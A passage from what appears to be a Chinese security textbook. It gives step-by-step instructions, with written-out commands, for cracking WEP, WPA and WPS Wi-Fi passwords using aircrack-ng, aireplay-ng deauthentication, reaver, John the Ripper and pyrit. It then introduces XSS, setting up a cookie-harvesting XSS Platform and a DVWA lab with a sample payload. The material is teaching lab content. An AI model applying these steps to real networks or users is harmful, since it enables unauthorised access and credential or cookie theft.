图 9-16 抓取指定数据
提示：抓取数据分为两块显示，第一个 BSSID代表 AP端的数据，第二个 BSSID代表 STA端的数据，当指定信道抓取数据后会多出一个 RXQ字段。 

Step03捕获认证过程。当 Airodump-ng工具捕获到 STA与 AP的认证过程，会多出 keystream字段，该字段也被称为密钥流，便有可能计算出无线路由的认证密码，如图 9-17所示。

图 9-17 捕获认证过程 
9.2.3.Aireplay-ng工具 

Aireplay-ng是一个注入帧的工具，它的主要作用是产生数据流量，这些数据流量会被用于微视频
153

Aircrack-ng，从而破解 WEP和 WPA/WPA2密码。 Aireplay-ng里包含了很多种不同的发包方式，用于获取 WPA握手包。Aireplay-ng当前支持的发包种类有 9种，如图 9-18所示。

图 9-18 Aireplay-ng当前支持的发包种类
下面详细介绍发包种类中各个参数的含义。

（1）deauth count：解除认证。

（2）fakeauth deplay：伪造认证。

（3）interactive：交互式注入。

（4）arpreplay：ARP请求包重放。

（5）chopchop：端点发包。

（6）fragment：碎片交错。

（7）caffe-latte：查询客户端以获取新的 IVs。

（8）cfrag：面向客户的碎片。

（9）migmode：WPA迁移模式。


（10）test：测试网卡可以发送哪种类型的数据包。


除了解除认证（ -0）和伪造认证（ -1）以外，其他所有发包都可以使用下面的过滤选项来限制数据包的来源。-b是最常用的一个过滤选项，它的作用是指定一个特定的接入点。帮助信息如图 9-19所示。

图 9-19 Aireplay-ng的帮助信息
主要参数介绍如下。
（1）-b bssid ：接入点的 MAC地址。

（2）-d dmac：目的 MAC地址。

（3）-s smac：源 MAC地址。

（4）-m len：数据包最小长度。

（5）-n len：数据包最大长度。

（6）-u type：含有关键词的控制帧。

（7）-v subt：含有表单数据的控制帧。

（8）-t tods：到目的地址的控制帧。

（9）-f fromds：从目的地址出发的控制帧。

（10）-w iswep：含有 WEP数据的控制帧。



当需要重放（注入）数据包时，会用到重放选项中的参数，不过，并不是每一种发包都能使用所有的选项。重放选项帮助信息如图 9-20所示。

图 9-20 重放选项帮助信息
主要参数介绍如下。

（1）-x nbpps：设置每秒发送数据包的数目。


（2）-p fctrl：设置控制帧中包含的信息（16进制）。

（3）-a bssid：设置接入点的 MAC地址。

（4）-c dmac：设置目的 MAC地址。

（5）-h smac：设置源 MAC地址。


（6）-g value：修改缓冲区的大小（默认值：8）。

（7）-F：选择第一次匹配的数据包。


（8）-e essid：虚假认证中，设置接入点名称。

（9）-o npckts：每次发包时包含数据包的数量。

（10）-q sec：设置持续活动时间。

（11）-y prga：包含共享密钥的关键数据流。 



Aireplay-ng有两个获取数据包来源，第一个是无线网卡的实时通信流，第二个则是 pcap文件。大部分商业的或开源的流量捕获与分析工具都可以识别标准的 pcap格式文件。从 pcap文件读取数据是 Aireplay-ng一个经常被忽视的功能。这个功能可以从捕捉的其他会话中读取数据包。注意，有很多种发包会在发包时生成 pcap文件以便重复使用。
当抓取指定 AP与数据时，如果想要抓取密钥必须在 AP与 STA开始建立关联时开始，此时如果已经有合法关联的 STA，为了避免一直等待它们重新关联，可以使用“ airepaly-ng -0 <发包次数 > –a <AP的 MAC地址 > -c <STA的 MAC地址 > wlan0mon”这条命令，运行效果如图 9-21所示，将已经关联的 STA与 AP断开连接，正常情况下 STA与 AP会自动重连。

图 9-21 断开 STA与 AP的连接
其中， -0后面的参数为发包次数，如果指定为 0表示不停地发送； -c后面的参数为需要解除关联的客户端 MAC地址，如果不指定将会以广播的形式发送，解除所有与 AP关联的客户端。使用抓取到的密钥流进行关联，可以使用“aireplay-ng -1 <间隔时间 > -e <ESSID> -y <密钥流文件 > -a <AP-MAC地址 > -h <需要关联的客户端 MAC地址 >”命令，执行后如图 9-22所示。

图 9-22 关联密钥流
当无线路由使用 WEP进行加密时，破解密码需要抓取大量的 IV值，可以采用抓取一段合法 ARP数据包，然后使用 Areplay-ng工具发送大量的 ARP数据包，这种方式叫重放，也就是合理数据重复发送使得 AP大量回应 ARP，在回应 ARP数据包中包含 IV，这种方式的前提是必须先建立关联，通过重放便可以收集 IV值，当收集到足够数量的 IV时，无论多复杂的密码都可以被计算出来，执行“ aireplay-ng -3 –b <AP-MAC地址 > -h <本机 MAC地址 > wlan0mon”命令便可以开始重放，如图 9-23所示。

图 9-23 发送 ARP数据包 

9.2.4.Aircrack-ng工具 
Aircrack-ng是一个 802.11的 WEP和 WPA/WPA2-PSK破解程序。一旦使用 Airodump-ng抓取
微视频足够多的加密数据包以后，Aircrack-ng可以用来破解 WEP密钥。 Aircrack-ng破解 WEP密钥有 3种方法，分别是 PTW方法、FMS/KoreK方法和词典比对方法。
（1）PTW（Pyshkin，Tews，Weinmann）方法：这是破解 WEP密钥的默认方式，它由两个阶段组成。第一个阶段是 Aircrack-ng只使用 ARP包，如果找不到密钥，再尝试捕捉到的其他数据包。要知道，并不是所有的数据包都可以用来进行 PTW破解，目前 PTW方法只能破解 40位和 104位的 WEP密钥。 PTW方法的优点是，它只需很少的数据包就可以破解 WEP密钥了。

（2）FMS/KoreK方法：这种方法包含了很多统计攻击方式来破解 WEP密钥，并且结合了暴力破解方式。

（3）词典比对方法：而对于 WPA/WPA2共享密钥，只有词典比对这一种方法。 SEE2则可以极大地加速这个漫长的比对过程。破解 WPA/WPA2时，需要一个四次握手包作为输入。对于 WPA来说，需要 4个包才能完成一次完整的握手，然而 Aircrack-ng只需要其中的两个就能够开始工作了。


使用 aircrack-ng命令查看其帮助信息，执行结果如图 9-24所示。

图 9-24 查看帮助信息
主要参数介绍如下。

（1）-a <amode>：强力攻击模式（1/WEP, 2/WPA-PSK）。

（2）-e <essid>：目标选择：网络标识符。

（3）-b <bssid>：目标选择：接入点的 MAC。


（4）-p <nbcpu> ：使用的 CPU（默认：所有 CPU）。

（5）-q：启用静音模式（无状态输出）。


（6）-C <macs> ：将给定的 AP合并到一个虚拟的 AP。

（7）-l <.le>：写入文件密钥。 WEP设置相关的选项，如图 9-25所示。




图 9-25 WEP设置相关的选项
主要参数介绍如下。

（1）-c：只搜索字母数字字符。

（2）-t：只搜索二进制编码的十进制字符。

（3）-h：搜索弗里茨的数字键。


（4）-d <mask>：使用密钥过滤（A1:XX:CF:YY）。

（5）-m <maddr>：MAC地址用以过滤掉无用数据包。

（6）-n <nbits>：WEP密钥长度 :64/128/152/256/512。

（7）-i- <index>：WEP密钥索引（1～ 4），默认值：任何。

（8）-f <fudge>：/穷举猜测因子，默认值：2。

（9）-k <korek>：禁用一个攻击方法（1到 17）。

（10）-x或 -x0：最后一个密钥字节进行穷举（缺省）。

（11）-x1：取消最后一个密钥字节的穷举（默认）。

（12）-x2：设置最后两个密钥字节进行穷举。

（13）-X：禁用多线程穷举。

（14）-y：实验性的单一穷举模式。


（15）-K：只使用旧的 KoreK攻击（pre-PTW）。

（16）-s：破解时显示密钥的 ASCII 值。


（17）-M <num>：指定最大使用的 IVs（初始向量）。

（18）-D：WEP伪装，跳过坏掉的密钥流。


（19）-P <num>：PTW排错∶ 1∶取消 Klein（方式），2 ∶ PTW。

（20）-l：只运行一次尝试用 PTW破解密钥。 WEP和 WPA-PSK破解选项，如图 9-26所示。



图 9-26 WEP和 WPA-PSK破解选项
主要参数介绍如下。
（1）-w <words>：路径表的文件名。

（2）-N<.le>：新会话文件名的路径。

（3）-R <.le>：现有会话文件名的路径。 WPA-PSK选项如图 9-27所示。




图 9-27 WPA-PSK选项
主要参数介绍如下。
（1）-E <.le> ：创建项目文件 ewsa V3。

（2）-J <.le> ：创建 Hashcat捕获文件。

（3）-S：WPA破解速度测试。 




9.2.5.Airbase-ng工具 
Airbase-ng作为多目标的工具，通常将自己伪装成 AP攻击客户端。该工具的功能丰富多样，
微视频常用的功能特性如下。
●实施 caffe latte WEP攻击。 

●实施 hirte WEP客户端攻击。 


●抓取 WPA/WPA2认证中的 handshake数据包。 

●伪装成 AD-Hoc AP。 

●完全伪装成一个合法的 AP。 


●通过 SSID或者和客户端 MAC地址进行过滤。 

●操作数据包并且重新发送。 



●加密发送的数据包以及解密抓取的数据包。该工具的主要目的是让客户端连接上伪装的 AP，而不是阻止它连接真实的 AP，当 Airbase-ng运行时会创建一个 tap接口，这个接口可以用来接收解密或者发送的加密数据包。
一个真实的客户端会发送 probe request，在网络中，这个数据帧对于绑定客户端到伪装 AP上具有重要的意义。在这种情况下伪装的 AP会回应任何的 probe request。建议最好使用过滤以防止附近所有的 AP都会被影响。 
Airbase-ng工具的命令格式及参数说明如图 9-28所示。

图 9-28 Airbase-ng工具的命令格式及参数说明
主要参数介绍如下。 ● -a：设置软 AP的 ssid。 ● -i：接口，从该接口抓取数据包。 ● -w：使用这个 WEP key加密 /解密数据包。 ● -h MAC：源 MAC地址（在中间人攻击时的 MAC地址）。 ● -f disallow：不容许某个客户端的 MAC地址（默认为容许）。 ● -W 0|1：不设置 WEP标志在 beacon（默认容许）。 ● -q：退出。 ● -v（--verbose）：显示进度信息。 ● -A：ad-hoc对等模式。
● -Y in|out|both：数据包处理。 ● -c：信道。 ● -X：隐藏 SSID。 ● -s：强制的将认证方式设为共享密钥认证（share authentication）。 ● -S：设置共享密钥的长度，默认为 128bit。 ● -L：caffe-Latte攻击。 ● -N：hirte攻击，产生 ARP request against WEP客户端。 ● -x nbpps：每秒的数据包。 ● -y：不回应广播的 probe request（即只回应携带 SSID的单播 probe request）。 ● -z：设置 WPA1的标记，1为 WEP40，2为 tkip，3为 WRAP，4为 CCMP，5为 wep104（即
不同的认证方式）。 ● -Z：和 -z作用一样，只是针对 WPA2。 ● -V：欺骗 EAPOL，1为 MD5，2为 SHA1，3为自动。 ● -F xxx：将所有收到的数据帧放到文件中，文件的前缀为 xxx。 ● -P：回应所有的 probes request，包括特殊的 ESSID。 ● -I：设置 beacon数据帧的发送间隔，单位：ms。 ● -C：开启对 ESSID的 beacon。 Airbase-ng工具的文件选项说明如图 9-29所示。

图 9-29 Airbase-ng工具的文件选项
主要参数介绍如下。 

● --bssid（-b）MAC：根据 AP的 MAC来过滤。 
● --bssids .le：根据文件中的 SSID来过滤。 

● --client（-c）MAC：让制定 MAC地址的客户端连接。 
● --clients .le：让文件中的 MAC地址的客户端可以连接上。 
● --essid ESSID：创建一个特殊的 SSID。 

● --essids .le：根据一个文件中的 SSID来过滤。 
9.3.使用工具破解无线路由密码
无线路由器密码的安全强度是进入无线网络的关键，要想从无线路由器进入内网，就必须要知道无线路由器的密码，使用一些破解工具可以破解出无线路由器的密码。 

9.3.1.使用 Aircrack-ng破解 WEP密码
使用 Aircrack-ng工具可以破解 WEP加密方式的无线路由密码。破解之前，首先登录无线路由微视频器，在“无线设置”中将“无线安全设置”设置成 WEP加密，如图 9-30所示，修改加密方式后需
重启路由才能生效。破解 WEP密码的具体操作步骤如下： 
Step01执行 airmon-ng strat wlan0命令，启动网卡并进入 monitor模式，执行结果如图 9-31所示。

图 9-30 设置 WEP加密方式


图 9-31 启动网卡并进入 monitor模式 

Step02执行“ airodump-ng –c <信道 > --bssid <AP-MAC地址 > -w <保存文件名 > wlan0mon”命令，启动数据抓包功能，并保存抓取后的文件，如图 9-32所示。

图 9-32 启动数据抓包功能 

Step03如果 AP与 STA有关联，可以使用“ arieplay-ng -0 1 –a <AP-MAC地址 > -c <已连接 STA-MAC地址 > wlan0mon”命令，执行该命令后，会解除 AP与 STA的关联，如图 9-33所示。

图 9-33 解除 AP与 STA的关联 

Step04此时会抓取到 AP与 STA关联时的密钥流，抓取的密钥流如图 9-34所示。

图 9-34 抓取密钥流 

Step05执行 ls命令，查看当前目录可以发现有一个“ .xor”结尾的文件，这个文件保存着 STA
关联 AP的密钥流，如图 9-35所示。

图 9-35 执行 ls命令

Step06利用 XOR文件与 AP建立关联，一旦获取到密钥流便可以将任意主机与 AP进行关联，
使用“aireplay-ng -1 <间隔时间 > -e <ESSID> -y <密钥流文件 > -a <AP-MAC地址 > -h <需要建立关联的 MAC地址 > wlan0mon”命令，可以使本机与 AP建立关联，如图 9-36所示。

图 9-36 将本机与 AP建立关联 

Step07执行 ARP重放收集 IV数据。执行 ARP重放需要先获取一个有效 ARP数据，本机只是
与 AP建立了关联并不能进行通信，所以还需要抓取一个有效 ARP通信，此时可以执行 “aireplay-ng -3 –b <AP-MAC地址 > -h <本机 MAC地址 > wlan0mon”命令，如图 9-37所示。

图 9-37 收集 IV数据 

Step08再次接触 AP与 STA关联，触发真实的 ARP数据包，产生以 replay_arp开头的文件，如图 9-38所示。

图 9-38 收集 ARP数据包 

Step09当产生这个 ARP合法数据包后，便会开始真正的 ARP重放，如图 9-39所示。

图 9-39 收集合法的 ARP数据包 

Step10尽量多的收集 IV，收集的 IV值越多越容易破解出密码，如图 9-40所示。

图 9-40 收集更多的 IV信息 

Step11使用 Aircrack-ng工具破解密码，该密码为 KEY FOUND!，KEY FOUND!后面方括号中是密码的 16进制形式，“ASCII：”后面便是常用的字符串密码，如图 9-41所示。

图 9-41 破解得出密码
提示：一旦收集到足够多的 IV，那么破解 WEP密码的速度就非常快，所以采用 WEP加密是不安全的。 
9.3.2.使用 Aircrack-ng破解 WPA密码
破解 WPA与 WEP不同，WEP需要收集大量 IV数据，而 WPA只需要抓取四次握手信息即可，

但是如果字典文件中没有密码是破解不出来的。 微视频
1.认识字典文件 

Kali Linux中本身自带了一些字典文件，查看自带字典文件的方法如下。
（1）/user/share/john目录下的 password.lst字典文件，如图 9-42所示。

图 9-42 password.lst字典文件
（2）/usr/share/wfuzz/wordlist/general目录下的字典文件，如图 9-43所示。

图 9-43 general目录下的字典文件
（3）/usr/share/wfuzz/wordlist/Injections目录下的字典文件，如图 9-44所示。

图 9-44 Injections目录下的字典文件
163


2.破解 WPA密码
破解文件之前，首先需要设置无线路由器的加密方式，设置方法为：首先登录无线路由器，在“无线设置”中将“无线安全设置”设置成 WPA加密，如图 9-45所示，修改加密方式后需重启路由才能生效。

破解 WPA密码的具体操作步骤如下。 
Step01使用 airmon-ng strat wlan0命令，启动网卡并进入 monitor模式，如图 9-46所示。
图 9-45 设置 WPA加密方式


图 9-46 启动网卡并进入 monitor模式 

Step02使用“ airodump-ng –c <信道 > --bssid <AP-MAC地址 > -w <保存文件名 > wlan0mon”命令，启动数据抓包功能，并保存抓取后的文件，如图 9-47所示。

图 9-47 启动数据抓包功能 

Step03如果 AP与 STA有关联，可以使用“ arieplay-ng -0 1 –a <AP-MAC地址 > -c <已连接 STA-MAC地址 > wlan0mon”命令，执行该命令后，会解除 AP与 STA的关联，如图 9-48所示。

图 9-48 解除 AP与 STA的关联 

Step04当抓取到 AP与 STA关联时的四次握手信息，如图 9-49所示，会给出相应的提示信息。

图 9-49 提示信息 

Step05使用“ aircrack-ng -w <字典文件 > wpa-01.cap”命令，即可破解出 WPA密码，如图 9-50所示。可以看到每秒筛选 2174个密码文件，如果字典中存在密码文件一定会破解出来，这里获取的密码为 Password。

图 9-50 破解 WPA密码 
9.3.3.使用 Reaver工具破解 WPS密码 
Reaver工具是目前流行的无线网络攻击工具，它主要针对的是 WPS漏洞。 Reaver工具会对 

WiFi保护设置（WPS）的注册 PIN码进行暴力破解攻击，并尝试恢复出 WPA/WPA2密码。微视频使用 Reaver工具破解密码的操作步骤如下。 
Step01使用 reaver命令，查看 reaver工具的帮助信息，所需参数如图 9-51所示。

图 9-51 reaver工具的帮助信息 

Step02将网卡设置成 monitor模式，寻找支持 WPS的 AP，使用 wash -U -i wlan0mon命令，执
行结果如图 9-52所示，其中 -U是表示以 UTF-8字符编码进行显示，-i是具体使用的网卡接口。

图 9-52 设置网卡为 monitor模式
提示：还可以使用 Airodump-ng这个工具来寻找支持 WPS的 AP，使用 airodump-ng –wps wlan0mon命令，同样可以，寻找到支持 WPS功能的 AP，执行结果如图 9-53所示。 

Step03破解 PIN码，使用“reaver -i wlan0mon -b <AP-MAC地址 > -vv -c 3”命令，其中 -vv是
显示详细信息，-c选择信道，如图 9-54所示，每次随机选择一个 PIN码进行发送。提示：在破解的过程中，如果加入 -K 1参数，可以快速破解出 AP的 PIN码。 

Step04获取到 PIN码后，可以通过 PIN码获取密码，这时可以使用“ reaver -i wlan0mon -b<AP-
MAC地址 > -vv -p <PIN码 >”命令来获取密码，这里获取的密码为 Password，如图 9-55所示。
165


图 9-53 寻找支持 WPS功能的 AP

　　


　　图 9-54 破解 PIN码图 9-55 通过 PIN码获取密码 
9.4.实战演练 
9.4.1.实战1：使用 JTR工具破解 WPA密码 
JTR（John the Ripper）是一个快速的密码破解工具，用于在已知密文的情况下尝试破解出明文的密码软件，支持目前大多数的加密算法。
使用 JTR破解密码的操作步骤如下。 


Step01打开配置文件并搜索 List.Rules:Wordlist字段，如图 9-56所示。 
Step02调整到 List.Rules:Wordlist字段的结尾处，加入“$[0-9] $[0-9] $[0-9] $[0-9]”字段，如图 9-57所示，这样便可以修改密码生成规则。


　　


图 9-56 搜索 List.Rules:Wordlist字段图 9-57 修改密码生成规则 

Step03使用“ john --wordlist=<密码文件 > --rules --stdout”命令，可以通过相应的规则生成密码，如图 9-58所示。其中，--wordlist是读取密码文件；--rules对该文件使用规则； --stdout进行显示。

图 9-58 通过规则生成密码

Step04使用 john --wordlist=dd.txt --rules --stdout | aircrack-ng -e Test-001 -w - wpa-01.cap命令，配合 Aircrack-ng进行密码破解，执行结果如图 9-59所示，可以看出密码为 Password666。

图 9-59 破解出密码信息 
9.4.2.实战2：使用 pyrit工具破解 AP密码 
pyrit是一款开源且完全免费的软件，任何人都可以检查、复制或修改它。它在各种平台上编译和执行，包括 FreeBSD、MacOS X和 Linux操作系统以及 x86、alpha、arm等处理器。
使用 pyrit工具最大的优点，在于它可以使用除 CPU之外的 GPU运算加速生成彩虹表，本身支持抓包获取四步握手过程，无需使用 airodump抓包，如果已经通过 ariodump抓取数据，也可以使用 pyrit进行读取。
问题：什么是彩虹表？

答：彩虹表是一个用于加密散列函数逆运算的预先计算好的表，为破解密码的散列值（或称哈希值、微缩图、摘要、指纹、哈希密文）而准备。一般主流的彩虹表都在 100G以上。这样的表常常用于恢复由有限集字符组成的固定长度的纯文本密码。
使用 pyrit命令，查看 pyrit工具的帮助信息，如图 9-60所示。

图 9-60 pyrit工具的帮助信息
使用 pyrit破解无线路由器密码的操作步骤如下。 
Step01使用 pyrit -r wlan0mon -o wpa.cap stripLive命令，开始抓取数据包，如图 9-61所示。 Step02使用 pyrit -r wpa.cap analyze命令，对抓取到的数据包进行分析，如图 9-62所示，可以
看到“Test-001”这个路由有四步握手的过程。

图 9-61 抓取数据包

图 9-62 分析数据包 

Step03如果想要使用 ariodump抓取的数据包，可以使用 pyrit -r 001-01.cap -o pyritwpa.cap strip命令，将 airodump的数据包做一个格式转换，如图 9-63所示。

图 9-63 转换数据包格式 

Step04使用“ pyrit –r<抓取的数据包文件 > –i<密码文件 >-b<AP-MAC地址 > attack_passthrough”命令，开始破解密码，这里破解出的密码为 Password，如图 9-64所示。

图 9-64 破解密码
10第 
章



跨站脚本攻击的防范
跨站脚本攻击是最普遍的 Web应用安全漏洞，这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中。当正常用户访问该页面时，则可导致嵌入的恶意脚本代码的执行，从而达到恶意攻击用户的目的。 
10.1.跨站脚本攻击概述
跨站脚本攻击（ Cross Site Script，为了区别于 CSS简称为 XSS）指的是恶意攻击者往 Web页面里插入恶意 html代码，当用户浏览该页之时，嵌入其中的 html代码会被执行，从而达到恶意攻击用户的特殊目的。 
10.1.1.认识 XSS 
XSS攻击全称跨站脚本攻击，它允许恶意 Web用户将代码植入提供给其他用户使用的页面中，

通过调用恶意的 JavaScript脚本来发起攻击。XSS攻击如此普遍和流行的主要原因有以下几点。微视频
（1）Web浏览器本身的设计是不安全的，浏览器包含了解析和执行 JavaScript等脚本语言的能力，这些语言可以用来创建各种丰富的功能，而浏览器只会执行，不会判断数据和代码是否恶意。

（2）输入和输出是 Web应用程序最基本的交互，在这个过程中，若没有做好安全防护， Web程序很容易出现 XSS漏洞。

（3）现在的应用程序大部分是通过团队合作完成的，程序员之间的水平参差不齐，很少有人受过正规的安全培训，不管是开发程序员还是安全工程师，很多人没有真正意识到 XSS的危害。

（4）触发跨站脚本攻击的方式非常简单，只要向 HTML代码中注入脚本即可，而且执行此类攻击的手段众多，譬如利用 CSS、Flash等。XSS技术的运用灵活多变，做到完全防御是一件相当困难的事情。


随着 Web 2.0的流行，网站上交互功能越来越丰富。 Web 2.0鼓励信息分享与交互，这样用户就有了更多的机会去查看和修改他人的信息，比如通过论坛、 blog或社交网络，于是黑客也就有了更广阔的空间发动 XSS攻击。 
10.1.2.XSS的模型 

XSS通过将精心构造的代码（JavaScript）注入网页中，并由浏览器解释运行这段 JavaScript代码，微视频
以达到恶意攻击的效果。当用户访问被 XSS脚本注入的网页， XSS脚本就会被提取出来，用户浏览器就会解析这段 XSS代码，也就是说用户被攻击了。
用户最简单的动作就是使用浏览器上网，并且浏览器中有 JavaScript解释器，可以解析 JavaScript，然后浏览器不会判断代码是否恶意。也就是说， XSS的对象是用户和浏览器。图 10-1所示为 XSS攻击模型示意图。

图 10-1 XSS攻击模型示意图 

10.1.3.XSS的危害
微博、留言板、聊天室等用于收集用户输入的地方，都有可能被注入 XSS代码，都存在遭受 
微视频XSS的风险，只要没有对用户的输入进行严格过滤，就会被 XSS。常见 XSS的危害如下。
（1）窃取 Cookie信息。恶意 JavaScript可以通过 document.cookie获取 Cookie信息，然后通过 XMLHttpRequest或者 Fetch加上 CORS功能将数据发送给恶意服务器；恶意服务器拿到用户的 Cookie信息之后，就可以在其他计算机上模拟用户的登录，然后进行转账等操作。

（2）监听用户行为。恶意 JavaScript可以使用 addEventListener接口来监听键盘事件，比如可以获取用户输入的信用卡等信息，将其发送到恶意服务器。黑客掌握了这些信息之后，又可以做很多违法的事情。

（3）通过修改 DOM伪造假的登录窗口，用来欺骗用户输入用户名和密码等信息。

（4）在页面内生成浮窗广告，这些广告会严重地影响用户体验。 




10.1.4.XSS的分类


微视频常见的 XSS攻击有反射型、 DOM型和存储型。其中反射型、 DOM型可以归类为非持久型 XSS攻击，存储型归类为持久型 XSS攻击。 
1.反射型

反射型 XSS一般是攻击者通过特定手法（如电子邮件）诱使用户去访问一个包含恶意代码的 URL，当受害者单击并访问这些专门设计的链接时，恶意代码会直接在受害者主机上的浏览器执行。此类 XSS通常出现在网站的搜索栏、用户登录口等地方，常用来窃取客户端 Cookies或进行钓鱼欺骗。 
2. DOM型

客户端的脚本程序可以动态地检查和修改页面内容，而不依赖于服务器端的数据。例如客户端从 URL中提取数据并在本地执行，如果用户在客户端输入的数据包含了恶意的 JavaScript脚本，而这些脚本没有经过适当的过滤和消毒，那么应用程序就可能受到 DOM XSS攻击。
3.存储型

攻击者事先将恶意代码上传或储存到漏洞服务器中，只要受害者浏览包含此恶意代码的页面就会执行恶意代码。这就意味着只要访问了这个页面的访客，都有可能会执行这段恶意脚本，因此存储型 XSS的危害会更大。
存储型 XSS一般出现在网站留言、评论等交互处，恶意脚本存储到客户端或者服务器端的数据库中。 
10.2.XSS平台搭建
跨站点 Scripter（又名 Xsser）是一个自动框架，用于检测、利用和报告基于 Web的应用程序中的 XSS漏洞，它包含几个可以绕过某些过滤器的选项，以及各种特殊的代码注入技术。本节介绍 XSS平台的搭建。 
10.2.1.下载源码
搭建 XSS测试平台的前提就是下载 XSS源码，下载地址为 https://pan.baidu.com/s/1NV4 NhFfjtRwBh34x-QZhNQ，下载之后将压缩包解压到 www的文件夹下，该文件夹就是网站的根目录，如图 10-2所示。

图 10-2 XSS源码 
10.2.2.配置环境
源码下载完成后，还需要配置环境，具体的操作步骤如下。 

Step01打开 PHPmyadmin工作界面，单击数据库，创建一个名称为 xssplatform的数据库，如图 10-3所示。 

Step02选中 xssplatform数据库，在 PHPmyadmin工作界面中单击“导入”按钮，进入“要导入的文件”界面，在其中单击“浏览”按钮，打开“选择要加载的文件”对话框，在其中选择要导入的数据库文件，如图 10-4所示。

图 10-3 创建数据库

图 10-4 选择要导入的数据库 

Step03单击“打开”按钮，返回“导入”工作界面中，可以看到添加的数据库文件路径，如图 10-5
所示。 

Step04单击“执行”按钮，即可将备份好的数据库文件导入 xssplatform数据库中，可以看到该数据库包含了 9张数据表，如图 10-6所示。

图 10-5 查看添加的数据库

图 10-6 导入数据库 

Step05修改 xss文件夹下的 con.g.php文件，这里修改的是用于数据库连接的语句，具体内容包括用户名、密码、数据库名，如图 10-7所示。

图 10-7 修改数据库连接信息 

Step06修改 xss文件夹下的 con.g.php文件，这里修改 url配置信息，具体内容包括访问 URL起始和伪静态的设置，如图 10-8所示。

图 10-8 修改 url配置信息 

Step07进入 PHPmyadmin工作界面，运行如下 SQL语句： 

将地址修改成创建的网站域名，如图 10-9所示。

图 10-9 修改网站域名 


然后将伪静态文件（ .htaccess）放置到 xss文件夹下，如图 10-10所示。至此， XSS平台就搭建好了。

图 10-10 配置伪静态文件
注意：一定要配置这个文件，如果没有配置的话，XSS平台生成的网址将不能获取他人的 Cookie信息。 
10.2.3.注册用户
环境配置完成后，还需要注册才能使用 XSS平台。注册用户的操作步骤如下。 
Step01在地址栏中输入 http://localhost/xss/index.php，即可打开 XSS Platform主页，如图 10-11所示。

图 10-11 XSS Platform主页 

Step02单击“注册”按钮，即可进入注册页面，在其中输入注册信息，如邀请码、用户名、邮箱、
密码等信息，如图 10-12所示。

图 10-12 输入注册信息 


“提交注册”按钮，即可完成用户的注册操作，并进入我的项目页面，如图 10-13所示。

图 10-13 我的项目页面 

Step04注册好自己的数据账户后，登录 PHPmyadmin工作界面，在其中将自己的账户 fendou权限设置为 1，如图 10-14所示。

图 10-14 修改账户的权限

Step05在地址栏中输入 http://localhost/xss/index.php，即可打开 XSS Platform主页，在其中输入注册的用户信息，这里输入 fendou，如图 10-15所示。

图 10-15 输入用户信息 

Step06单击“登录”按钮，即可进入 XSS Platform主页，在其中单击“邀请”按钮，进入“邀
请码生成”页面，如图 10-16所示。

图 10-16 “邀请码生成”页面 

Step07单击“乌云币奖品邀请码”和“其他邀请码”超链接，即可生成邀请码，如图 10-17所示。

图 10-17 生成邀请码 

Step08退出 fendou用户，使用生成的邀请码邀请好友注册，如图 10-18所示。

图 10-18 使用邀请码注册 

Step09单击“提交注册”按钮，即可完成用户的注册，当前用户为 fendou123，如图 10-19所示。

图 10-19 完成用户的注册 
10.2.4.测试使用
新建一个项目，测试生成的 XSS漏洞是否可以使用，具体的操作步骤如下。 

Step01在 XSS Platform主页中单击“我的项目”右侧的“创建”按钮，如图 10-20所示。

图 10-20 创建“我的项目”

Step02在打开的“创建项目”工作界面中输入项目名称和项目描述信息，如图 10-21所示。

图 10-21 输入项目名称和项目描述信息 

Step03单击“下一步”按钮，进入项目详细信息页面，这里勾选“默认模块”复选框，如图 10-22
所示。

图 10-22 项目详细信息页面 

Step04单击“下一步”按钮，即可完成项目的创建，如图 10-23所示。

图 10-23 完成项目的创建 

Step05在地址栏中输入 http://localhost/xss/JI2vUi网址并运行，即可出现如图 10-24所示的运行结果，这就说明 Apache伪静态配置成功，如图 10-24所示。

图 10-24 Apache伪静态配置成功提示：如果伪静态没有配置成功就会出现如图 10-25所示的错误提示信息。

图 10-25 Apache伪静态配置未成功
10.3.XSS攻击实例分析 
XSS攻击是在网页中嵌入客户端恶意脚本代码，这些恶意代码一般是使用 JavaScript语言编写的。本节分析一些简单的 XSS攻击实例。 
10.3.1.搭建 XSS攻击 
DVWA（Damn Vulnerable Web App）是一个基于 PHP/MySQL搭建的 Web应用程序，旨在为安全专业人员测试自己的专业技能和工具提供合法的环境，帮助 Web开发者更好地理解 Web应用安全防范的过程。使用 DVWA搭建 XSS攻击靶场的操作步骤如下。 

Step01下载 DVWA源码，下载地址为 https://github.com/ethicalhack3r/DVWA，如图 10-26所示。

图 10-26 DVWA下载页面 

Step02将下载的 DVWA安装包解压，然后将解压的文件夹放置在 Wampserver32的 www目录下，如图 10-27所示。

图 10-27 DVWA文件夹


Step03打开 DVWA目录，会看到 config.inc.php文件，打开该文件，将默认的数据库用户名设置为 root，密码设置为 123，因为 PHPmyadmin的默认数据库名为 root，密码设置为 123，如图 10-28所示。 

Step04在浏览器中输入 http://localhost/dvwa/setup. php，进入 DVWA安装网页，如图 10-29所示。
图 10-28 修改 con.g.inc.php文件


图 10-29 DVWA安装网页 

Step05在 DVWA安装网页的底部单击“创建 /重置数据库”按钮，就可以安装数据库了，如图 10-30所示。

图 10-30 安装数据库

Step06安装完数据库后，网页会自动跳转 DVWA的登录页，输入用户名 admin，密码 password，如图 10-31所示。

图 10-31 输入用户名与密码 

Step07单击“登录”按钮，就可以进入该网站平台进行安全测试的实践了，如图 10-32所示。

图 10-32 DVWA网站平台 

Step08单击 DVWA按钮，进入 DVWA安全页面，在其中设置 DVWA的安全等级为 low，最后
单击“提交”按钮即可，如图 10-33所示。

图 10-33 设置 DVWA的安全等级 
10.3.2.反射型 XSS
反射型 XSS又称为非持久型跨站点脚本攻击，它是常见的一类 XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。一个典型的非持久型 XSS包含一个带 XSS攻击向量的链接，即每次攻击需要用户的点击。
下面演示反射型 XSS的攻击过程，具体的操作步骤如下。 

Step01在 DVWA工作界面中选择 XSS（反射型）选项，进入 XSS（反射型）操作界面，如图 
10-34所示。 

Step02在文本框中随意输入一个用户名，这里输入 Tom，提交之后就会在页面上显示，如图 10-35
所示，从 URL中可以看出，用户名是通过 name参数以 GET方式提交的。


　

　　图 10-34 XSS（反射型）操作界面图 10-35 输入用户名

Step03查看源代码，可以看出没有做任何限制，如图 10-36所示。 

Step04在输入框中输入 payload:<script>alert（/xss/）</script>，这是 JavaScript语句，大家可以自行学习，前端表单的执行语句是 JavaScript，如图 10-37所示。

　　


　　　　　　图 10-36 查看源代码图 10-37 执行 JavaScript语句 

